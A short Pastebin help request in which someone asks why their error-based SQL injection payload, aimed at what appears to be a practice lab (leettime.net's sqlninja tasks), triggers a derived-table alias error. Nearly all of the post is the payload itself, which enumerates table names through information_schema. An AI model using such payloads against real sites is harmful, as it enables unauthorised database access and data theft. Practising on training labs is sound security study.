Advertisement
Guest User

SQL HELP

a guest
May 27th, 2016
75
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.48 KB | None | 0 0
  1. What am I doing wrong?
  2.  
  3. Error message: Every derived table must have its own alias
  4.  
  5. Code:
  6.  
  7. http://leettime.net/sqlninja.com/tasks/basic_ch2.php?id=1 and(select 1 from(select count(*),concat((select (select distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e)) from information_schema.tables where table_schema=0x6c65657474696d655f37363177486f6c65 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement